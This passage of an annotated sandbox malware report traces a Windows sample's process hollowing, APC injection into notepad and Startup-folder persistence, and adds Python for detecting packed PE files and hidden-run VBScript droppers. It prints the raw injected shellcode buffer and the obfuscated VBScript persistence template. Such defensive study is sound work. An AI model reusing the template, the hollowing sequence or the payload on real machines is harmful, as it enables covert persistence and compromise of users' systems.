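    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk the section table of a PE image; returns [(name, rva, virtual_size, raw_bytes)]."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    offset = e_lfanew + 24 + opt_size            # first IMAGE_SECTION_HEADER
    sections = []
    for _ in range(num_sections):
        name, vsize, rva, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, offset)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, rva, vsize, pe[raw_ptr:raw_ptr + raw_size]))
        offset += 40
    return sections


def packer_indicators(pe):
    """Per-section entropy plus the two Cuckoo-style marks and the Delphi section-name check."""
    rows = [(name, shannon_entropy(raw), len(raw)) for name, _, _, raw in parse_sections(pe)]
    total = sum(size for _, _, size in rows)
    high = [(name, ent, size) for name, ent, size in rows if ent > SECTION_ENTROPY_THRESHOLD]
    ratio = sum(size for _, _, size in high) / total if total else 0.0
    return {
        "sections": rows,
        "high_entropy_sections": high,
        "high_entropy_ratio": ratio,     # the report's 0.48 is this ratio, not bits per byte
        "overall_high": ratio > HIGH_ENTROPY_RATIO_THRESHOLD,
        "borland_names": sorted({name for name, _, _ in rows} & BORLAND_SECTION_NAMES),
    }


def build_sample_pe(seed=1):
    """Constructed test input: a minimal PE32 with CODE/DATA/BSS plus a large pseudo-random .rsrc,
    mirroring the layout the report describes (not derived from the sample, contains no real code)."""
    rng = random.Random(seed)
    bodies = [
        ("CODE", 0x1000, (b"mov eax,[ebp+8]; call LoadLibraryA; " * 200)[:4096]),
        ("DATA", 0x2000, bytes([0, 1]) * 1024),
        ("BSS", 0x3000, b""),                    # uninitialised data, no raw bytes on disk
        (".rsrc", 0x4000, bytes(rng.getrandbits(8) for _ in range(8192))),
    ]
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)      # PE32 optional header, rest zeroed
    headers = 0x40 + 4 + 20 + len(opt) + 40 * len(bodies)
    raw_base = (headers + 0x1FF) & ~0x1FF                    # file alignment 0x200
    table, blobs = b"", b""
    for name, rva, body in bodies:
        raw_ptr = raw_base + len(blobs) if body else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             max(len(body), 0x1000), rva, len(body), raw_ptr, 0, 0, 0, 0, 0)
        blobs += body
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)     # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(bodies), 0, 0, 0, len(opt), 0x102)
    return (dos + coff + opt + table).ljust(raw_base, b"\0") + blobs


if __name__ == "__main__":
    for key, value in packer_indicators(build_sample_pe()).items():
        print(key, value)
```

Feeding a real file is `packer_indicators(open(path, "rb").read())`; on a Delphi binary expect all three Borland names and, if the payload lives in resources as it does here, .rsrc as the only high-entropy section.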
Expresses interest in specific running processes (1 event)
process ghfjghfjhj.exe
Repeatedly searches for a not-found process, you may want to run a web browser during analysis (22 events). The process_name in each failed Process32NextW record is the last snapshot entry read before enumeration ended, not a name the sample looked for: inject-x86.exe is the sandbox monitor's own injector helper, and mscorsvw.exe and sppsvc.exe are Windows services.
Time & API Arguments Status Return Repeated
1619596027.579879
Process32NextW
process_name: 757bc8ab5108fb1a24919f43e0bde7e2.exe
snapshot_handle: 0x0000010c
process_identifier: 2900
failed 0 0
1619605680.833
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 2308
failed 0 0
1619605683.051375
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3124
failed 0 0
1619605691.067375
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x000001ac
process_identifier: 2856
failed 0 0
1619605692.1615
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3256
failed 0 0
1619605695.30225
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3428
failed 0 0
1619605697.52125
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x00000140
process_identifier: 3340
failed 0 0
1619605698.89625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3508
failed 0 0
1619605702.2705
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3656
failed 0 0
1619605705.5205
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x00000164
process_identifier: 3692
failed 0 0
1619605707.50525
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3768
failed 0 0
1619605710.6455
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x0000010c
process_identifier: 3848
failed 0 0
1619605720.4265
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x000001bc
process_identifier: 3848
failed 0 0
1619605721.489625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3128
failed 0 0
1619605728.379625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3216
failed 0 0
1619605732.036625
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x00000150
process_identifier: 2440
failed 0 0
1619605733.724
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3352
failed 0 0
1619605737.1615
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3276
failed 0 0
1619605739.9575
Process32NextW
process_name: mscorsvw.exe
snapshot_handle: 0x0000015c
process_identifier: 3576
failed 0 0
1619605740.832625
Process32NextW
process_name: mscorsvw.exe
snapshot_handle: 0x0000010c
process_identifier: 3660
failed 0 0
1619605742.787
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 4012
failed 0 0
1619605748.021
Process32NextW
process_name: sppsvc.exe
snapshot_handle: 0x0000017c
process_identifier: 1940
failed 0 0
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14 (Google address space; either the address is hard-coded or the lookup happened outside the captured trace)
Creates an Alternate Data Stream (ADS) (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe:ZoneIdentifier (note the stream name: the mark-of-the-web stream that Windows and AV products read is Zone.Identifier, with a dot; check the copy with dir /r or Get-Item -Stream * to see whether the sample wrote a differently named stream or the report dropped the dot)
Allocates execute permission to another process indicative of possible code injection (1 event)
Time & API Arguments Status Return Repeated
1619596028.189879
NtAllocateVirtualMemory
process_identifier: 2208
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000f0000
success 0 0
Installs itself for autorun at Windows startup (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Deletes executed files from disk (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
Creates a thread using NtQueueApcThread in a remote process potentially indicative of process injection (2 events)
Process injection Process 2900 created a thread in remote process 2208
Time & API Arguments Status Return Repeated
1619596028.189879
NtQueueApcThread
thread_handle: 0x0000011c
process_identifier: 2208
function_address: 0x000f05c0
parameter: 0x00100000
success 0 0
Potential code injection by writing to the memory of another process (2 events)
Time & API Arguments Status Return Repeated
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000f0000
success 1 0
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exe" webSet NOtWRwkxfrv = CreateoBjecT("wscriPt.SheLl") NotWrWkxfRV.ruN """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x00100000
success 1 0
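The second buffer is the parameter block the injected code receives: back to back, the original path under Temp, the copy path under AppData\Roaming\appdata, a quoted command line for the original with the argument web, and a VBScript template. %ls is a wide-string printf placeholder; with a path filled in (presumably the copy's) it becomes the web.vbs dropped into the Startup folder, which runs its target with window style 0, i.e. hidden. Note the randomised capitalisation (CreateoBjecT, wscriPt.SheLl, .ruN): VBScript is case-insensitive, so the script runs unchanged while any case-sensitive match on "WScript.Shell" or ".Run" misses it. The Python below is an added example, not taken from the page or from any sandbox: it renders the template the way the payload would, classifies a Startup-folder script with case-insensitive patterns, and scans a folder for such files. The line break between the two VBScript statements and the exact path used for %ls are assumptions; the report shows the template on one line.

```python
import re
from pathlib import Path

# Template recovered from the parameter block in the report. %ls is a wide-string printf
# placeholder; the line break after the first statement is an assumption (the report shows
# the template collapsed onto one line).
VBS_TEMPLATE = ('Set NOtWRwkxfrv = CreateoBjecT("wscriPt.SheLl")\r\n'
                'NotWrWkxfRV.ruN """%ls""", 0, False')
# Assumed %ls value: the copy the report shows under AppData\Roaming\appdata.
COPY_PATH = r"C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"

# VBScript is case-insensitive, so every pattern must be too: the template's mixed case
# ("CreateoBjecT", "wscriPt.SheLl", ".ruN") defeats a case-sensitive substring match.
SHELL_RE = re.compile(r'createobject\s*\(\s*"wscript\.shell"\s*\)', re.I)
RUN_RE = re.compile(r'\.run\s+("(?:[^"]|"")*")\s*(?:,\s*(\d+))?', re.I)


def render_template(template, path):
    """What the payload does with %ls, reduced to a plain substitution."""
    return template.replace("%ls", path)


def vbs_string(literal):
    """Decode a VBScript string literal: strip the outer quotes, unescape doubled quotes."""
    return literal[1:-1].replace('""', '"')


def classify_startup_script(text):
    """Flag a Startup-folder script that launches something hidden from a user-profile path."""
    has_shell = SHELL_RE.search(text) is not None
    match = RUN_RE.search(text)
    if not (has_shell and match):
        return {"wscript_shell": has_shell, "run": None, "window_style": None, "suspicious": False}
    command = vbs_string(match.group(1)).strip().strip('"')   # the payload double-quotes the path
    style = int(match.group(2)) if match.group(2) else None   # 0 = hidden window; None = not given
    hidden = style == 0
    from_profile = re.search(r"\\appdata\\(roaming|local)\\", command, re.I) is not None
    return {"wscript_shell": True, "run": command, "window_style": style,
            "suspicious": hidden and from_profile}


def scan_startup(folder):
    """Classify every .vbs in a Startup folder; returns [(path, verdict)] for the suspicious ones."""
    hits = []
    for path in sorted(Path(folder).glob("*.vbs")):
        verdict = classify_startup_script(path.read_text(errors="replace"))
        if verdict["suspicious"]:
            hits.append((path, verdict))
    return hits


if __name__ == "__main__":
    import os
    startup = Path(os.environ.get("APPDATA", "")) / "Microsoft/Windows/Start Menu/Programs/Startup"
    for path, verdict in (scan_startup(startup) if startup.is_dir() else []):
        print(path, verdict)
    print(classify_startup_script(render_template(VBS_TEMPLATE, COPY_PATH)))
```

The classifier keys on behaviour (WScript.Shell, a hidden Run, a target under the user profile) rather than on the obfuscated spelling, so a re-randomised variant of the same template is still caught.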
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (14 events). In every record eip is left at 0 while eax is set to 5503936 (0x53fbc0) and ebx to 2130567168 (0x7efde000), the PEB address on this 32-bit Windows 7 guest: the shape of classic process hollowing, where the suspended primary thread's eax holds the entry point it will jump to and ebx the PEB whose ImageBaseAddress gets patched.
Process injection Process 2244 called NtSetContextThread to modify thread in remote process 2760
Process injection Process 3196 called NtSetContextThread to modify thread in remote process 3272
Process injection Process 3452 called NtSetContextThread to modify thread in remote process 3528
Process injection Process 3716 called NtSetContextThread to modify thread in remote process 3788
Process injection Process 1320 called NtSetContextThread to modify thread in remote process 2032
Process injection Process 3240 called NtSetContextThread to modify thread in remote process 3384
Process injection Process 3620 called NtSetContextThread to modify thread in remote process 1344
Time & API Arguments Status Return Repeated
1619605681.349
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2760
success 0 0
1619605692.6925
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3272
success 0 0
1619605699.39625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3528
success 0 0
1619605708.17725
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3788
success 0 0
1619605723.395625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2032
success 0 0
1619605734.146
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3384
success 0 0
1619605741.332625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1344
success 0 0
Resumed a suspended thread in a remote process potentially indicative of process injection (14 events)
Process injection Process 2244 resumed a thread in remote process 2760
Process injection Process 3196 resumed a thread in remote process 3272
Process injection Process 3452 resumed a thread in remote process 3528
Process injection Process 3716 resumed a thread in remote process 3788
Process injection Process 1320 resumed a thread in remote process 2032
Process injection Process 3240 resumed a thread in remote process 3384
Process injection Process 3620 resumed a thread in remote process 1344
Time & API Arguments Status Return Repeated
1619605682.005
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2760
success 0 0
1619605693.4735
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3272
success 0 0
1619605700.16225
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3528
success 0 0
1619605708.97425
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3788
success 0 0
1619605727.114625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2032
success 0 0
1619605735.708
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3384
success 0 0
1619605741.864625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1344
success 0 0
Executed a process and injected code into it, probably while unpacking (50 of 62 events shown)
Time & API Arguments Status Return Repeated
1619596028.189879
CreateProcessInternalW
thread_identifier: 2272
thread_handle: 0x0000011c
process_identifier: 2208
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619596028.189879
NtAllocateVirtualMemory
process_identifier: 2208
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000f0000
success 0 0
1619596028.189879
NtAllocateVirtualMemory
process_identifier: 2208
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00100000
success 0 0
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000f0000
success 1 0
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exe" webSet NOtWRwkxfrv = CreateoBjecT("wscriPt.SheLl") NotWrWkxfRV.ruN """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x00100000
success 1 0
1619605680.09875
CreateProcessInternalW
thread_identifier: 2436
thread_handle: 0x000000d0
process_identifier: 2244
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000cc
inherit_handles: 0
success 1 0
1619605681.146
CreateProcessInternalW
thread_identifier: 2732
thread_handle: 0x0000011c
process_identifier: 2760
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605681.146
NtUnmapViewOfSection
process_identifier: 2760
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605681.177
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 2760
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605681.349
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605681.349
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2760
success 0 0
1619605682.005
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2760
success 0 0
1619605682.115
CreateProcessInternalW
thread_identifier: 2864
thread_handle: 0x00000120
process_identifier: 2856
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 2760 28890843
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605691.223375
CreateProcessInternalW
thread_identifier: 3200
thread_handle: 0x000001b0
process_identifier: 3196
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000001b4
inherit_handles: 0
success 1 0
1619605692.4895
CreateProcessInternalW
thread_identifier: 3276
thread_handle: 0x0000011c
process_identifier: 3272
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605692.4895
NtUnmapViewOfSection
process_identifier: 3272
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
